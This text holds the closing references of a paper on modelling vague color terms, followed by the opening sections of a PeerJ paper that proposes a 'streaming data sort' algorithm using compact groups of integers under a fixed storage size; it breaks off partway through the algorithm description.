eration of referring expressions (Krahmer and van Deemter, 2012). Following Kyburg and Morreau (2000), we could represent this using LUX via a pos- terior over the threshold parameters that fit the target but exclude its alternatives. Again, our model as- sociates such goals with quantitative measures that future research can explore empirically. Meo et al. (2014) present an initial exploration of this idea. These open questions complement the key advan- tage that makes uncertainty about meaning crucial to the success of the model and experiments we have reported here. Many kinds of language use seem to be highly variable, and approaches to grounded se- mantics need ways to make room for this variabil- ity both in the semantic representations they learn and the algorithms that induce these representations from language data. We have argued that uncertainty about meaning is a powerful new tool to do this. We look forward to future work addressing uncertainty in grounded meanings in a wide range of continu- ous domains—generalizing from color to quantity, scales, space and time—and pursuing a wide range of reasoning efforts, to corroborate our results and to leverage them in grounded language use. Acknowledgments This work was supported in part by NSF DGE- 0549115. This work has benefited from discus- sion and feedback from the reviewers of TACL, Ma- neesh Agrawala, David DeVault, Jason Eisner, Tarek El-Gaaly, Katrin Erk, Vicky Froyen, Joshua Gang, Pernille Hemmer, Alex Lascarides, and Tim Meo. References Hirotugu Akaike. 1974. A new look at the statistical model identification. IEEE Transactions on Automatic Control, 19(6):716–723. John R. Anderson. 1991. The adaptive nature of human categorization. Psychological Review, 98(3):409. Jacob Andreas and Dan Klein. 2014. Grounding lan- guage with points and paths in continuous spaces. In Proceedings of the Eighteenth Conference on Com- putational Natural Language Learning, pages 58–67, June. Chris Barker. 2002. The dynamics of vagueness. Lin- guistics and Philosophy, 25(1):1–36. Brent Berlin. 1991. Basic Color Terms: Their Univer- sality and Evolution. Univ of California Press. Susan E. Brennan and Herbert H. Clark. 1996. Concep- tual pacts and lexical choice in conversation. Journal of Experimental Psychology: Learning, Memory and Cognition, 22(6):1482–1493. Stephen P. Brooks and Andrew Gelman. 1998. Gen- eral methods for monitoring convergence of iterative simulations. Journal of Computational and Graphical Statistics, 7(4):434–455. Peter F. Brown, Vincent J. Della Pietra, Robert L. Mercer, Stephen A. Della Pietra, and Jennifer C. Lai. 1992. An estimate of an upper bound for the entropy of English. Computational Linguistics, 18(1):31–40. Elia Bruni, Gemma Boleda, Marco Baroni, and Nam- Khanh Tran. 2012. Distributional semantics in tech- nicolor. In Proceedings of the 50th Annual Meeting of the Association for Computational Linguistics, pages 136–145. Stanley F. Chen and Joshua Goodman. 1996. An empiri- cal study of smoothing techniques for language model- ing. In Proceedings of the 34th annual meeting on As- sociation for Computational Linguistics, pages 310– 318. David L. Chen and Raymond J. Mooney. 2008. Learning to sportscast: a test of grounded language acquisition. In ICML ’08: Proceedings of the 25th international conference on Machine learning, pages 128–135. Siddhartha Chib and Edward Greenberg. 1995. Un- derstanding the Metropolis–Hastings algorithm. The American Statistician, 49(4):327–335. Jason Chuang, Maureen Stone, and Pat Hanrahan. 2008. A probabilistic model of the categorical association between colors. In Color Imaging Conference, pages 6–11. Sam Cumming. 2013. Coordination and content. Philosophers’ Imprint, 13(4):1–16. Colin R. Dawson, Jeremy Wright, Antons Rebguns, Marco Valenzuela Escárcega, Daniel Fried, and Paul R. Cohen. 2013. A generative probabilis- tic framework for learning spatial language. In 2013 IEEE Third Joint International Conference on Development and Learning and Epigenetic Robotics (ICDL), pages 1–8. IEEE. David DeVault, Iris Oved, and Matthew Stone. 2006. So- cietal grounding is essential to meaningful language use. In Proceedings of the Twenty-first National Con- ference on Artificial Intelligence, pages 747–754. Mark D. Fairchild. 2013. Color Appearance Models. The Wiley-IS&T Series in Imaging Science and Tech- nology. Wiley. Delia Graff Fara. 2000. Shifting sands: An interest- relative theory of vagueness. Philosophical Topics, 28(1):45–81. Ali Farhadi, Ian Endres, Derek Hoiem, and David Forsyth. 2009. Describing objects by their attributes. 2009 IEEE Conference on Computer Vision and Pat- tern Recognition, pages 1778–1785, June. George W. Furnas, Thomas K. Landauer, Louis M. Gomez, and Susan T. Dumais. 1987. The vocabulary problem in human-system communication. Communi- cations of the ACM, 30(11):964–971. Peter Gärdenfors. 2000. Conceptual Spaces. MIT Press. Andrew Gelman, Gareth O. Roberts, and Walter R. Gilks. 1996. Efficient Metropolis jumping rules. In J. M. Bernardo, J. O. Berger, A. P. Dawid, and A. F. Smith, editors, Bayesian Statistics 5, pages 599–607. Oxford University Press. Herbert P. Grice. 1975. Logic and conversation. In P. Cole and J. Morgan, editors, Syntax and Semantics III: Speech Acts, pages 41–58. Academic Press. Stevan Harnad. 1990. The symbol grounding problem. Physica D: Nonlinear Phenomena, 42(1–3):335–346. Jeffrey Heer and Maureen Stone. 2012. Color naming models for color selection, image editing and palette design. In Proceedings of the SIGCHI Conference on Human Factors in Computing Systems, pages 1007– 1016. John F. Hughes, Andries van Dam, Morgan McGuire, David F. Sklar, James D. Foley, Steven K. Feiner, and Kurt Akeley. 2013. Computer Graphics: Principles and Practice (3rd Edition). Addison-Wesley Profes- sional. Gerhard Jäger. 2010. Natural color categories are con- vex sets. In Maria Aloni, Harald Bastiaanse, Tikitu de Jager, and Katrin Schulz, editors, Logic, Language and Meaning - 17th Amsterdam Colloquium, Amster- dam, The Netherlands, December 16-18, 2009, Re- vised Selected Papers, volume 6042 of Lecture Notes in Computer Science, pages 11–20. Springer. Fred Jelinek, Robert L. Mercer, Lalit R. Bahl, and James K. Baker. 1977. Perplexity–a measure of the difficulty of speech recognition tasks. The Journal of the Acoustical Society of America, 62:S63. Paul Kay, Brent Berlin, Luisa Maffi, William R. Merri- field, and Richard Cook. 2009. The World Color Sur- vey. CSLI. Emiel Krahmer and Kees van Deemter. 2012. Compu- tational generation of referring expressions: A survey. Computational Linguistics, 38(1):173–218. Jayant Krishnamurthy and Thomas Kollar. 2013. Jointly learning to parse and perceive: Connecting natural lan- guage to the physical world. Transactions of the Asso- ciation for Computational Linguistics, 1(2):193–206. Alice Kyburg and Michael Morreau. 2000. Fitting words: Vague words in context. Linguistics and Phi- losophy, 23(6):577–597. Johan Maurice Gisele Lammens. 1994. A computational model of color perception and color naming. Ph.D. thesis, SUNY Buffalo. Staffan Larsson. 2013. Formal semantics for percep- tual classification. Journal of Logic and Computa- tion. Advance online publication. doi: 10.1093/log- com/ext059. Daniel Lassiter. 2009. Vagueness as probabilistic lin- guistic knowledge. In Rick Nouwen, Robert van Rooij, Uli Sauerland, and Hans-Christian Schmitz, editors, Vagueness in Communication - International Workshop, ViC 2009, held as part of ESSLLI 2009, Bordeaux, France, July 20-24, 2009. Revised Selected Papers, volume 6517 of Lecture Notes in Computer Science, pages 127–150. Springer. David K. Lewis. 1969. Convention: A Philosophical Study. Harvard University Press, Cambridge, MA. Cynthia Matuszek, Nicholas Fitzgerald, Luke Zettle- moyer, Liefeng Bo, and Dieter Fox. 2012. A joint model of language and perception for grounded at- tribute learning. In Proceedings of the 29th Interna- tional Conference on Machine Learning (ICML-12), pages 1671–1678. http://dx.doi.org/10.1093/logcom/ext059 http://dx.doi.org/10.1093/logcom/ext059 Nikolaos Mavridis and Deb Roy. 2006. Grounded situation models for robots: Where words and per- cepts meet. In Intelligent Robots and Systems, 2006 IEEE/RSJ International Conference on, pages 4690– 4697. IEEE. Timothy Meo, Brian McMahan, and Matthew Stone. 2014. Generating and resolving vague color refer- ences. In SEMDIAL 2014: THE 18th Workshop on the Semantics and Pragmatics of Dialogue, pages 107– 115. Nicholas Metropolis, Arianna W. Rosenbluth, Mar- shall N. Rosenbluth, Augusta H. Teller, and Edward Teller. 1953. Equation of state calculations by fast computing machines. The Journal of Chemical Physics, 21(6):1087–1092. Randall Munroe. 2010. Color survey results. On- line at http://blog.xkcd.com/2010/05/03/color-survey- results/. Kimele Persaud and Pernille Hemmer. 2014. The in- fluence of knowledge and expectations for color on episodic memory. In P Bello, M Guarini, M Mc- Shane, and B Scassellati, editors, Proceedings of the 36th Annual Conference of the Cognitive Science So- ciety, pages 1162–1167. Terry Regier, Paul Kay, and Richard S. Cook. 2005. Fo- cal colors are universal after all. Proceedings of the National Academy of Sciences, 102:8386–8391. Terry Regier, Paul Kay, and Naveen Khetarpal. 2007. Color naming reflects optimal partitions of color space. Proceedings of the National Academy of Sci- ences, 104:1436–1441. Carina Silberer, Vittorio Ferrari, and Mirella Lapata. 2013. Models of Semantic Representation with Visual Attributes. In Proceedings of the 51st Annual Meet- ing of the Association for Computational Linguistics, pages 572–582. Nathaniel J. Smith, Noah D. Goodman, and Michael C. Frank. 2013. Learning and using language via recur- sive pragmatic reasoning about other agents. In Ad- vances in Neural Information Processing Systems 26, pages 3039–3047. Stefanie Tellex, Thomas Kollar, and Steven Dickerson. 2011a. Approaching the symbol grounding problem with probabilistic graphical models. AI magazine, 32(4):64–76. Stefanie Tellex, Thomas Kollar, Steven Dickerson, Matthew R Walter, Ashis Gopal Banerjee, Seth J Teller, and Nicholas Roy. 2011b. Understanding nat- ural language commands for robotic navigation and mobile manipulation. In Proceedings of the Twenty- Fifth AAAI Conference on Artificial Intelligence, pages 1507–1514. Terry Winograd. 1970. Procedures as a representation for data in a computer program for understanding nat- ural language. Ph.D. thesis, MIT. Peter Young, Alice Lai, Micah Hodosh, and Julia Hock- enmaier. 2014. From image descriptions to visual denotations: New similarity metrics for semantic in- ference over event descriptions. Transactions of the Association for Computational Linguistics, 2:67–78. John M. Zelle and Raymond J. Mooney. 1996. Learn- ing to parse database queries using inductive logic pro- gramming. In Proceedings of the National Conference on Artificial Intelligence, pages 1050–1055. Luke S. Zettlemoyer and Michael Collins. 2005. Learn- ing to map sentences to logical form: Structured clas- sification with probabilistic categorial grammars. In UAI ’05, Proceedings of the 21st Conference in Un- certainty in Artificial Intelligence, pages 658–666. Introduction Related Work Using Vague Color Terms: A Model Color Categories Semantic Representation Rational Observer Model Learning Experiment Munroe Color Corpus Fitting the Model Parameters Model Evaluation Alternative Models Evaluation Metrics Decision-Based Metrics Likelihood-Based Metrics Evaluation Results Discussion and Conclusion work_gocqmq4fknd2fjg2ixbgjj53nu ---- Correct and stable sorting for overflow streaming data with a limited storage size and a uniprocessor Correct and stable sorting for overflow streaming data with a limited storage size and a uniprocessor Suluk Chaikhan, Suphakant Phimoltares and Chidchanok Lursinsap Advanced Virtual and Intelligent Computing (AVIC) Research Center, Department of Mathematics and Computer Science, Faculty of Science, Chulalongkorn University, Bangkok, Thailand ABSTRACT Tremendous quantities of numeric data have been generated as streams in various cyber ecosystems. Sorting is one of the most fundamental operations to gain knowledge from data. However, due to size restrictions of data storage which includes storage inside and outside CPU with respect to the massive streaming data sources, data can obviously overflow the storage. Consequently, all classic sorting algorithms of the past are incapable of obtaining a correct sorted sequence because data to be sorted cannot be totally stored in the data storage. This paper proposes a new sorting algorithm called streaming data sort for streaming data on a uniprocessor constrained by a limited storage size and the correctness of the sorted order. Data continuously flow into the storage as consecutive chunks with chunk sizes less than the storage size. A theoretical analysis of the space bound and the time complexity is provided. The sorting time complexity is O (n), where n is the number of incoming data. The space complexity is O (M), where M is the storage size. The experimental results show that streaming data sort can handle a million permuted data by using a storage whose size is set as low as 35% of the data size. This proposed concept can be practically applied to various applications in different fields where the data always overflow the working storage and sorting process is needed. Subjects Algorithms and Analysis of Algorithms, Artificial Intelligence, Data Science Keywords Algorithms, Sorting, Memory, Algorithm design and analysis, Computational intelligence INTRODUCTIONS Currently, the growth of data consumption by internet users has exponentially increased (Laga et al., 2017; Bey Ahmed Khernache, Laga & Boukhobza, 2018), and a massive storage size is required to store all incoming data to avoid any data loss in case of storage overflow (Thusoo et al., 2010; Katal, Wazid & Goudar, 2013; Witayangkurn, Horanont & Shibasaki, 2012; Mehmood et al., 2016). However, many applications such as data management, finance, sensor networks, security-relevant data, and web search possibly face this unexpected situation of a storage overload issue (Lee et al., 2016; Babcock et al., 2002; Keim, Qu & Ma, 2013; Cardenas, Manadhata & Rajan, 2013; Dave & Gianey, 2016). This issue induces the problem of representing big data with a limited storage size. Furthermore, some primitive operations such as the classic sorting algorithms (e.g., quick How to cite this article Chaikhan S, Phimoltares S, Lursinsap C. 2021. Correct and stable sorting for overflow streaming data with a limited storage size and a uniprocessor. PeerJ Comput. Sci. 7:e355 DOI 10.7717/peerj-cs.355 Submitted 26 October 2020 Accepted 17 December 2020 Published 12 February 2021 Corresponding authors Suluk Chaikhan, suluk.c@student.chula.ac.th Suphakant Phimoltares, suphakant.p@chula.ac.th Academic editor Marcin Woźniak Additional Information and Declarations can be found on page 24 DOI 10.7717/peerj-cs.355 Copyright 2021 Chaikhan et al. Distributed under Creative Commons CC-BY 4.0 http://dx.doi.org/10.7717/peerj-cs.355 mailto:suluk.�c@�student.�chula.�ac.�th mailto:suphakant.�p@�chula.�ac.�th https://peerj.com/academic-boards/editors/ https://peerj.com/academic-boards/editors/ http://dx.doi.org/10.7717/peerj-cs.355 http://www.creativecommons.org/licenses/by/4.0/ http://www.creativecommons.org/licenses/by/4.0/ https://peerj.com/computer-science/ sort, heap sort) cannot be implemented due to the restrictive constraint of storing all sorted data inside the storage during the sorting process. A sorting algorithm is the first important step of many algorithms (Cormen et al., 2009; Huang, Liu & Li, 2019) such as searching and finding a closest pair (Singh & Sarmah, 2015; Tambouratzis, 1999). Generally, when referring to data storage of a computer, it can be either primary storage (internal storage) or secondary storage (external storage). The size of primary storage is much smaller than that of the secondary storage. With reference to the size of storage, there are two types of sorting: internal sort and external sort. All data to be sorted by an internal sorting algorithm must be entirely stored inside the primary storage. Some of traditional internal sorting algorithms are bubble sort, insertion sort, quick sort, merge sort, and radix sort. However, if the data overflow the primary storage, the overflow must be stored in the secondary storage. In this case, external sort algorithms can be employed. Although these classic sorting algorithms are very efficient in terms of time and space complexities, the actual quantity of data generated yearly on the internet has grown tremendously faster than the growth rate of storage capacity based on the current fabrication technology (for both primary storage and secondary storage). This severe condition makes the classic sorting algorithms, where all data must be stored inside the computer, very inefficient because all overflowed data are lost. In this study, both internal and external storage are viewed as one unit of storage with a limited size. This size is not gradually augmented during the sorting process of continuously incoming data. The challenging problem to be studied is how to sort the data under the constraints of limited storage capacity and storage overflow. The data are assumed to flow into the storage as a sequence of data chunks with various sizes less than or equal to the storage size. Recently, many internal sorting algorithms have been remodeled by reducing comparison, swapping, and the time complexity to reduce the sorting time. Farnoud, Yaakobi & Bruck (2016) proposed an algorithm that sorts big data based on limited internal storage, but the result is a partial sort. Concoms sort (Agrawal & Sriram, 2015) is an algorithm that uses a swapping technique with no adjacent swapping. It reduces the execution time in some cases when compared to selection sort and outperforms bubble sort in every case. In particular, in the case that the input is a descending sequence, Concoms sort is more efficient than both traditional algorithms. Mapping sort (Osama, Omar & Badr, 2016) is a new algorithm that does not use comparisons and the swapping technique but it uses the mapping technique instead. This algorithm achieved the worst case time complexity of O(n) + O(n log n). Vignesh & Pradhan (2016) proposed a sorting algorithm by improving merge sort. It uses multiple pivots to sort data. The execution time of this algorithm is better than quick sort and merge sort in the best case and the average case, respectively. In addition, proximity merge sort (Franceschini, 2004) was proposed by improving the algorithm with an in-place property. Faro, Marino & Scafiti (2020) modified insertion sort to reduce the time complacency by inserting multiple elements for one iteration. The time complexity is Oðn1þ1hÞ, where h 2 N. Idrizi, Rustemi & Dalipi (2017) modified the sorting algorithm by separating the data sequence into three Chaikhan et al. (2021), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.355 2/27 http://dx.doi.org/10.7717/peerj-cs.355 https://peerj.com/computer-science/ parts, namely, negative numbers, zero numbers, and positive numbers. After the data in each part are sorted by printing the result, the algorithm can decrease the comparison by a separating process. Bidirectional conditional insertion sort algorithm (Mohammed, Amrahov & Çelebi, 2017) is a two-pivot insertion sort algorithm using the left comparator and right comparator. It is faster than insertion sort, and the time complexity is nearly close to O(n1.5). Brownian motus and clustered binary insertion sort methods (Goel & Kumar, 2018) are algorithms that adapted insertion sort and binary insertion sort to reduce the comparison and the execution time. Both algorithms are suitable for sorting partial data. Internal sorting algorithms in the literature have focused on reducing the time for processing, but the storage issue for big data has been ignored. Presently, accessing a large piece of information or big data is simple because of rapid technological advancements such as the cloud (Al-Fuqaha et al., 2015; Kehoe et al., 2015; Vatrapu et al., 2016) and network technology (YiLiang & Zhenghong, 2016; Zhao, Chang & Liu, 2017; Zhai, Zhang & Hu, 2018). One of the issues for sorting big data is the restricted internal storage, which is usually smaller than the size of big data. All big data cannot be stored in the internal storage. Therefore, the internal sorting algorithms cannot sort big data at one time. The external sorting algorithms are developed from the classic merge sorting algorithm to sort big data, which is separated into two phases: (1) the sorting phase sorts a small chunk of big data in the internal storage. After sorting, all sorted chunks are stored in the external storage and (2) the merging phase combines all sorted chunks from the sorting phase into a single sorted list. Recently, TaraByte sort (O’Malley, 2008) has used three Hadoop applications, namely, TeraGen, TeraSort, and TeraValidate, to sort big data. This algorithm sorts 10 billion data in 209 s. This process is very fast, but it is expensive because it requires many processing units for sorting. Kanza & Yaari (2016) studied external sorting problems and designed multi-insertion sort and SCS-Merge V1 to V3. The objective of these algorithms is to decrease the write cost of intermediate results of sorting. Active sort (Gantz & Reinsel, 2012) is an algorithm that merges sorted chunks inside SSDs and is applied with Hadoop to reduce the number of reading and writing data. MONTRES (Laga et al., 2017), the algorithm designed for SSDs, can reduce the read and write cost of I/O in a linear function. External sorting algorithms in the literature have focused on reducing the read and write cost in terms of the execution time for processing, but the storage issue for keeping big data is still ignored. Liang et al. (2020) proposed a new algorithm, namely, B*-sort, which was designed on NVRAM and applied on a binary search tree structure. In addition, Farnoud, Yaakobi & Bruck (2016) studied approximate sorting of streaming permuted data with limited storage; however, the result is not exactly sorted data, and only an approximate result is obtained when determining the data positions. Conversely, the approximate positions of ordered data can be provided when using the values as inputs. Elder & Goh (2018) studied permutation sorting by finite and infinite stacks. Although all possible permutations cannot be sorted, the exact order and values can be obtained. Let n be the total streaming numbers to be sorted and M ≪ n be the limited size of working Chaikhan et al. (2021), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.355 3/27 http://dx.doi.org/10.7717/peerj-cs.355 https://peerj.com/computer-science/ storage. Table 1 summarizes the efficiency of various classic sorting methods and our proposed method (stream sort) in terms of seven characteristics: requiring extra storage, preserving the input appearance order, time complexity, space complexity, sorting streaming data, correct sorting order, and correct retrieved value by the sorted order. This article proposes a new algorithm called streaming data sort for sorting streaming data with limited storage size by using only a single central processing unit. The proposed algorithm can correctly and stably handle a streaming data size of at least 2.857 times larger than the size of the working storage. The following concerns are emphasized in this study. � All data must be in the exactly correct order after being sorted. No approximate and partial ordering is allowed in this study. � The time complexity of streaming data sort of all iterations is O(n). CONSTRAINTS In the stationary data environment, all classic sorting algorithms are based on the assumption that all numbers to be sorted must be entirely stored in the working storage of a computer during the sorting process. This implies that the whole data set cannot exceed the working storage size during the sorting process. Figure 1 illustrates storage constraint of the working storage in streaming data sort. However, in the streaming data environment, the data continuously flow into the computer one chunk at a time, and the number of incoming chunks is unknown in advance. If the size of the data chunk is larger than the working storage size, then the overflow will be permanently discarded from the computer. This makes the sorted result wrong. To make the study sufficiently feasible for analysis and practice, the following constraints are imposed. Table 1 Comparison of sorting algorithms on streaming data. n is the total streaming numbers to be sorted and M ≪ n is the limited size of working storage. Sorting algorithms Requiring extra storage Preserving input appearance order Time complexity Working space complexity Applicable to streaming data Correct order Correct value Bubble sort No Yes O(n2) O(n) No Yes Yes Selection sort No No O(n2) O(n) No Yes Yes Insertion sort No Yes O(n2) O(n) Yes Yes Yes Quick sort No No O(n2) O(n) No Yes Yes Merge sort Yes Yes O(n lg n) O(n) No Yes Yes Heap sort No No O(n lg n) O(n) No Yes Yes Permutation sort (Farnoud, Yaakobi & Bruck, 2016) No No O(n/ω(log2 n)) O(n) No Yes Yes Permutation sort (Elder & Goh, 2018) Yes Yes N/A O(n) Yes No No External sorting Yes Yes N/A O(n) Yes Yes Yes Streaming data sort No Yes O(n) O(M) Yes Yes Yes Chaikhan et al. (2021), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.355 4/27 http://dx.doi.org/10.7717/peerj-cs.355 https://peerj.com/computer-science/ 1. The sorting process is performed by using only a fixed working storage of size M. This working storage is for storing the incoming data, previously sorted data, and other temporal data structures generated during the sorting process. No extra storage module is added during this period. The proposed sorting algorithm and the operating system are not stored in this working storage. 2. All numbers are integers. For floating numbers, they must first be transformed into integers. 3. At any time t, the sizes of previously sorted data in a compact form and the size of next incoming data chunk (h) must not exceed M. 4. The present incoming data chunk is completely discarded after being processed by the proposed sorting algorithm. 5. Only four types of relation between any two temporal consecutive numbers di and di + 1 are studied in this paper. The details and rationale of concentrating on these four types will be elaborated later. Figure 1 Storage constraint. Case 1 for D ≤ M where all data must be in the storage. Case 2 for D ≫ M and D ≤ M + E where data overflow the storage. Case 3 for mwork = M + E, the constraint of this study. Full-size DOI: 10.7717/peerj-cs.355/fig-1 Chaikhan et al. (2021), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.355 5/27 http://dx.doi.org/10.7717/peerj-cs.355/fig-1 http://dx.doi.org/10.7717/peerj-cs.355 https://peerj.com/computer-science/ The second constraint is the main concern of this study. After sorting the first incoming data chunk, all numbers are captured in a compact form and all sorted numbers are completely discarded. This compact form is used in conjunction with the next incoming data chunk for sorting. To avoid a storage overflow obstruction, the fourth constraint must be presented. The last constraint is derived from real-world data sets. From the observation of real-world streaming data sets from the UCI Repository (Dua & Graff, 2019) such as the census income, diabetes 130-US hospitals, incident management process event log, PM2.5 of five Chinese cities, KEGG metabolic relation network, Beijing multi-site air quality, and Buzz in social media, it is remarkable that most of the different values between two temporal consecutive numbers are between 0.38 and 2.98 on average. Hence, only four types of relations between any two temporal consecutive numbers are the focus. The definition of each type will be given in the next section. DEFINITIONS AND NOTATIONS Definition 1 The window at time t, denoted by W(t) = (d1, d2, …, dh), is a sequence of h ≤ M incoming numeric data at time t. Definition 2 The sorted window of W(t) at time t, denoted by W(t) = (w1, w2, …, wh | wi = dj, wi + 1 = dk and 8wi; wiþ1 2 WðtÞ : wi < wiþ1Þ, is a sequence of increasingly sorted numeric data of W(t). Definition 3 Type-1 subsequence T1 = (wi, …, wi + l) � WðtÞ is a sequence such that ∀ wi, wi + 1 ∈ T1: |wi − wi + 1| = 1. An example of a Type-1 sequence is (1, 2, 3, 4, 5). The different value between any two adjacent numbers is equal to 1, namely, (|1 − 2|,|2 − 3|,|3 − 4|,|4 − 5|) = (1,1,1,1). Definition 4 Type-2 subsequence T2 = (wi, …,wi+l) ⊆W (t) is a sequence such that ∀wi+a, wi+a+1 ∈ T2, 0 ≤ a ≤ l−1 : |wi+a−wi+a+1| = 1 when a is even and |wi+a−wi+a+1| = 2 when a is odd. An example of a Type-2 sequence is (4, 5, 7, 8, 10). The different value between any two adjacent numbers is equal to either 1 or 2, namely, (|4–5|, |5–7|, |7–8|, |8–10|) = (1, 2, 1, 2). Definition 5 Type-3 subsequence T3 = (wi, …,wi+l) ⊆W (t) is a sequence such that ∀wi+a, wi+a+1 ∈ T3, 0 ≤ a ≤ l−1 : |wi+a−wi+a+1| = 2 when a is even and |wi+a−wi+a+1| = 1 when a is odd. An example of a Type-3 sequence is (5, 7, 8, 10, 11). The different value between any two adjacent numbers is equal to either 1 or 2, namely, (|5–7|, |7–8|, |8–10|, |10–11|) = (2, 1, 2, 1). Definition 6 Type-4 subsequence T4 = (wi,…,wi+l) ⊆ W (t) is a sequence such that ∀wi,wi+1 ∈ T4: |wi−wi+1| = 2. An example of a Type-4 sequence is (8, 10, 12, 14, 16). The different value between any two adjacent numbers is equal to either 1 or 2, namely, (|8–10|, |10–12|, |12–14|, |14–16|) = (2, 2, 2, 2). During the sorting process by the proposed algorithm, it is necessary to identify the type of subsequence to be sorted first. Given a subsequence (wi,…,wi+l) ∈W (t), the type of this subsequence can be easily identified as type-p by setting p ¼ wiþ2 þ wiþ1−2ðwi þ 1Þ (1) Chaikhan et al. (2021), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.355 6/27 http://dx.doi.org/10.7717/peerj-cs.355 https://peerj.com/computer-science/ Each already sorted subsequence (wi, …, wi + l) ∈ W (t) is compactly written in a form of (u, v)(p) where u = wi and v = wi + l are used during the sorting process to minimize the storage use. (u, v)(p) is named compact group p. Any numeric data in between u and v are called removed data. These removed data are not considered and can be removed after the sorting process. For example, subsequence (1, 2, 3, 4, 5) is compacted as (1, 5)(1); (4, 5, 7, 8, 10) is compacted as (4, 10)(2); (5, 7, 8, 10) is compacted as (5, 10)(3); and (8, 10, 12, 14) is compacted as (8, 14)(4). Note that a sequence W(t) may contain several compact groups and some single numbers. Suppose W(t) = (1, 2, 3, 4, 5, 7, 8, 10, 12, 14, 19). This sequence consists of the following subsequences (1, 5)(1), (8, 14)(4). Thus, W(t) can be rewritten in another form of compact groups and a set of single numbers as W(t) = ((1, 5)(1), 7, (8, 14)(4), 19). However, it is possible to find another set of compact groups from W(t) as WðtÞ¼ ððð1; 3Þð1Þ; ð4; 7Þð2Þ; ð8; 14Þð4Þ; 19Þ. Obviously, different sets of compact groups for any W(t) use different storage sizes to store them. To distinguish between W(t) written in the original sequence of numbers and W(t) written in a form of compact groups having a set of single numbers, the notation Q(t) is used instead of W(t) to denote a combination set of compact groups and single numbers. Each compact group i in Q(t) is denoted by qi. In fact, either each compact group or a single number in Q(t) can be considered as an element of Q(t). For example, if W(t) = (1, 2, 3, 4, 5, 7, 8, 10, 12, 14, 19), then Q(t) = ((1, 5)(1), 7, (8, 14)(4), 19) such that q1 = (1, 5) (1), q2 = (8, 14) (4). All removed data of compact group (u, v)(p) will be occasionally retrieved to obtain a complete sorted subsequence in order to involve the new incoming subsequence in the sorting process. Hence, each retrieved number is denoted by ri to make it different from each input number wi during the sorting process. The retrieved sequence of (u, v) (p), denoted R((u, v)(p)), can be obtained by using the following rules. r1 ¼ u (2) r1þl ¼ v (3) riþ1 ¼ ( ri þ 1 for p ¼ 1 ri þ ðri � r1 þ p � 1Þ mod 3 for p ¼ 2; 3 ri þ 2 for p ¼ 4 (4) To illustrate how to retrieve all numbers from a compact group, consider an example of sequence (5, 7, 8, 10) represented by the compact group (5, 10)(3). The retrieved numbers of (5, 10)(3) can be computed as follows: Since p = 3, r1 = 5, r2 = (5) + ((5) − (5) + (3) − 1) mod 3 = 7, r3 = (7) + ((7) − (5) + (3) − 1) mod 3 = 8, r4 = (8) + ((8) − (5) + (3) − 1) mod 3 = 10, r4 = 10 = v. Accordingly, R ð5; 10Þð3Þ � � ¼ ð5; 7; 8; 10Þ. CONCEPTS The size of each incoming sequence is assumed to be at most the size of working storage. To make the working storage available for storing the next incoming data chunk after sorting the current chunk, it is required to represent some sorted subsequent numbers in a form of a compact group. However, not all subsequent sorted numbers can be compacted. Chaikhan et al. (2021), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.355 7/27 http://dx.doi.org/10.7717/peerj-cs.355 https://peerj.com/computer-science/ The properties and concept of a compact group representation will be discussed next. The sorting process consists of the following three main steps. 1. Transform the initial incoming sequence W(1) into a set of compact groups qi ∈ Q (1). 2. At time t, obtain the next incoming sequence and insert each number wi ∈ W (t) into the previous Q(t − 1) at the appropriate position. 3. If there exist any adjacent compact groups qi = (a,b) (a) and qi + 1 = (c,d) (β) such that the retrieved sequences R((a,b)(a)) and R((c,d)(β)) satisfy one of the types of subsequences, then form a new compact group from the sequences of R((a,b)(a)) and R((c,d)(β)). Steps 2 and 3 are iterated until there are no more incoming sequences. The details of each step will be discussed next. Figure 2 shows an example of how the proposed approximate sorting works. The storage size |mtot| is 10. The first incoming 10-number sequence, that is, (18, 1, 10, 6, 2, 12, 9, 3, 16, 19), fills the whole storage. This sequence is sorted in an ascending order and forms a set Q(1) = ((1, 3)(1), 6, (9, 12)(2), (16, 19)(3)), as shown in Fig. 2A. The size of the storage used is decreased to 7. The second incoming sequence (14, 11, 17) is inserted into some compact groups in Q(1) to obtain Q(2) = ((1, 3)(1), 6, (9, 12)(1), 14, (16, 19)(1)), as shown in Fig. 2B. The size of the storage used after the second incoming sequence is increased to 8. The third incoming sequence (13, 20) is separately grouped with (9, 12)(1) and (16, 19)(1) from the previous Q(2) to make a new Q(3) = ((1, 3)(1), 6, (9, 13)(1), 14, (16, 20)(1)). Observe that the compact group (9, 13)(1) can be grouped with the single number 14 to make (9, 14)(1). Therefore, Q(3) = ((1, 3)(1), 6, (9, 14)(1), (16, 20)(1)). The fourth incoming sequence (8, 4, 15) is possibly and separately grouped with (9, 14)(1), (1, 3)(1), and (16, 19)(1) in Q(3) to obtain Q(4) = ((1, 4)(1), 6, (8, 20)(1)). The last incoming sequence (5, 7) is possibly and separately grouped with (1, 4)(1), 6, (8, 20)(1) in Q(4) to obtain Q(5) = ((1, 20)(1)). PROPOSED ALGORITHM The proposed sorting algorithm is composed of the following two major steps. These steps are based on the constraints previously imposed in Constraints Section. 1. Obtain the first input number sequence and sort the number in an ascending order. Then, create Q(1), a set of compact groups and a set of a single number. 2. At time t, obtain the next set of number sequences and insert the numbers into Q(t − 1) to create the next Q(t). 3. Repeat step 2 until there are no more new incoming sequences. The deils of steps 1 and 2 will be discussed in the following sections. Creating compact groups There are four types of compact groups. To identify the type of compact group from a number sequence, four counters c1, c2, c3, and c4 for type-1, type-2, type-3, and type-4, respectively, are employed. Let s(i) be the status condition of type-i. The value of s(i) is defined as follows. Chaikhan et al. (2021), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.355 8/27 http://dx.doi.org/10.7717/peerj-cs.355 https://peerj.com/computer-science/ Definition 7 Type-1 status condition s(1) of a datum wk + i and its neighbors in a type-1 subsequence wk,…,wk + i,…,wk + m, where m < h is a constant defined by: sð1Þ ¼ 1 wkþi � wkþi�1 ¼ 1 for 0 � i � m 0 otherwise: � Definition 8 Type-2 status condition s(2) of a datum wk + i and its neighbors in a type-2 subsequence wk,…,wk + i,…,wk + m, where m < h is a constant defined by: sð2Þ ¼ 1 ðwkþi�1 � wkÞ mod 3 þ 1 ¼ wkþi � wkþi�1 for 0 � i � m 0 otherwise: � Figure 2 An example of streaming data sort. The sorting steps are 